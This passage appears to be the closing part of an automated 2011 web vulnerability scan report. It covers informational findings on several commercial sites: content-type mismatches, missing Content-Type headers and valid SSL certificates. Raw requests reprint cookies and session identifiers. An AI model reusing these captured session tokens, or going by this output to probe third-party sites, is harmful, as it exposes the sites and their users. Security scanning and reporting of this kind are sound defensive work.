HTTP/1.1 200 OKContent-Type: text/plain .1.2.0.2 (H;max-age=28800+0;age=21646;ecid=97070579830,0)..... ...............H...H...........................................................VVW ...[SNIP]...
20.4. http://wd.sharethis.com/api/getCount2.php
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://wd.sharethis.com
Path:
/api/getCount2.php
Issue detail
The response contains the following Content-type statement:The response states that it contains HTML . However, it actually appears to contain script .
Request
GET /api/getCount2.php?cb=stButtons.processCB&url=http%3A%2F%2Fwww.javaworld.com%2Fjavaworld%2Fjw-10-2007%2Fjw-10-acegi2.html HTTP/1.1/javaworld/jw-10-2007/jw-10-acegi2.html;q=0.3T7FCnHuAg==; __uset=yes
Response
HTTP/1.1 200 OKContent-Type: text/html .processCB({"url":"http:\/\/www.javaworld.com\/javaworld\/jw-10-2007\/jw-10-acegi2.html","email":5,"wordpress":1,"slashdot":2,"twitter":1,"stumbleupon":1,"total":10,"ourl":"http:\...[SNIP]...
20.5. https://www.ca.com/images/icons/checkmark.gif
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
https://www.ca.com
Path:
/images/icons/checkmark.gif
Issue detail
The response contains the following Content-type statement:The response states that it contains a GIF image . However, it actually appears to contain a PNG image .
Request
GET /images/icons/checkmark.gif HTTP/1.1/register/createprofile.aspx?returnURL=/us/default.aspx;q=0.3=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351461237:ss=1315351389192
Response
HTTP/1.1 200 OKContent-Type: image/gif .sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....PLTE...@.9<.6=.6...............C.=J.D......A.;s.o{.wA.:7.0;.4p.kH.A.........b.^e.a...Q.K.....[SNIP]...
20.6. http://www.javaworld.com/favicon.ico
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.javaworld.com
Path:
/favicon.ico
Issue detail
The response contains the following Content-type statement:Content-Type: text/plain; charset=UTF-8 plain text . However, it actually appears to contain unrecognised content .
Request
GET /favicon.ico HTTP/1.1;q=0.3.1315331151623899; CP=null*; __utma=51115954.1360305783.1315349155.1315349155.1315349155.1; __utmb=51115954.1.10.1315349155; __utmc=51115954; __utmz=51115954.1315349155.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=acegisecurity; __switchTo5x=31; __unam=80e81ea-13240eb6f64-4c95886-1
Response
HTTP/1.1 200 OK"Content-Type: text/plain; charset=UTF-8 .............................................................................................................................................[SNIP]...
21. Content type is not specified
previous
next
There are 4 instances of this issue:
Issue description
If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
21.1. http://www.javalobby.org/favicon.ico
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.javalobby.org
Path:
/favicon.ico
Request
GET /favicon.ico HTTP/1.1;q=0.3_8jKx4-it; __utma=125574289.255423471.1315349166.1315349166.1315349166.1; __utmb=125574289; __utmc=125574289; __utmz=125574289.1315349166.1.1.utmccn=(organic)|utmcsr=google|utmctr=acegisecurity|utmcmd=organic; __qca=P0-26411862-1315349166480
Response
HTTP/1.1 200 OK..... ....................................N8..si..}b..tn..._...g...h...v..........................................................................................................[SNIP]...
21.2. http://www.kb.sony.com/Platform/Publishing/images/DT/icons/6/DT_MICROSOFTKB_1_1
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.kb.sony.com
Path:
/Platform/Publishing/images/DT/icons/6/DT_MICROSOFTKB_1_1
Request
GET /Platform/Publishing/images/DT/icons/6/DT_MICROSOFTKB_1_1 HTTP/1.1/selfservice/microsites/searchEntry.do?locale=LA_eng_US&usemicrosite=true®ion=UMRE_UNITEDSTATES_2_5&sonyregion=US&searchString=dvd%20mp3&product=&sonytemplate=&sonymodel=&language=en_US;q=0.305161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%7D; fsr.a=1315353083271
Response
HTTP/1.1 200 OK-s....y~r..q.>.KKK...spaf..Id...W....UG..L?u.!l....WVV..R)....p...........|..)........j..&....a,..w.._..HV..}.'fff...dmW......?.......P..{..^..r..x..6.iW.yH.....u.....M`..\bh....[SNIP]...
21.3. http://www.kb.sony.com/Platform/Publishing/images/DT/icons/600/DT_KNOWLEDGEARTICLES_1_1
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.kb.sony.com
Path:
/Platform/Publishing/images/DT/icons/600/DT_KNOWLEDGEARTICLES_1_1
Request
GET /Platform/Publishing/images/DT/icons/600/DT_KNOWLEDGEARTICLES_1_1 HTTP/1.1/selfservice/microsites/searchEntry.do?locale=LA_eng_US&usemicrosite=true®ion=UMRE_UNITEDSTATES_2_5&sonyregion=US&searchString=dvd%20mp3&product=&sonytemplate=&sonymodel=&language=en_US;q=0.305161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%7D; fsr.a=1315353081761
Response
HTTP/1.1 200 OK!.......,.......... ............s.M.| F.Y...m.......;
21.4. http://www.kb.sony.com/Platform/Publishing/images/DT/icons/703/DT_MANUAL_1_1
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.kb.sony.com
Path:
/Platform/Publishing/images/DT/icons/703/DT_MANUAL_1_1
Request
GET /Platform/Publishing/images/DT/icons/703/DT_MANUAL_1_1 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7/selfservice/microsites/searchEntry.do%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.8,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":5,"lc":{"d0":{"v":5,"s":true}},"f":1315353359267,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; JSESSIONID=6F1BBF4FAA397E25738BB1398F7623C7; fsr.a=1315353359592
Response
HTTP/1.1 200 OK..,..........!.......d.:..L.Q.m.......Y.U.:r5s..;
22. SSL certificate
previous
There are 2 instances of this issue:
Issue background
SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.
22.1. https://store.trendmicro.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://store.trendmicro.com
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational.Server certificate Issued to: store.trendmicro.com Issued by: VeriSign Class 3 Secure Server CA - G3 Valid from: Sun Apr 10 18:00:00 GMT-06:00 2011 Valid to: Tue Apr 10 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: VeriSign Class 3 Secure Server CA - G3 Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Sun Feb 07 18:00:00 GMT-06:00 2010 Valid to: Fri Feb 07 17:59:59 GMT-06:00 2020
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
22.2. https://www.ca.com/
previous
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.ca.com
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational.Server certificate Issued to: www.ca.com Issued by: VeriSign Class 3 Secure Server CA - G3 Valid from: Mon Oct 11 18:00:00 GMT-06:00 2010 Valid to: Wed Oct 12 17:59:59 GMT-06:00 2011
Certificate chain #1 Issued to: VeriSign Class 3 Secure Server CA - G3 Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Sun Feb 07 18:00:00 GMT-06:00 2010 Valid to: Fri Feb 07 17:59:59 GMT-06:00 2020
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Wed Jul 16 17:59:59 GMT-06:00 2036
Report generated by XSS.CX at Wed Sep 07 14:16:34 GMT-06:00 2011.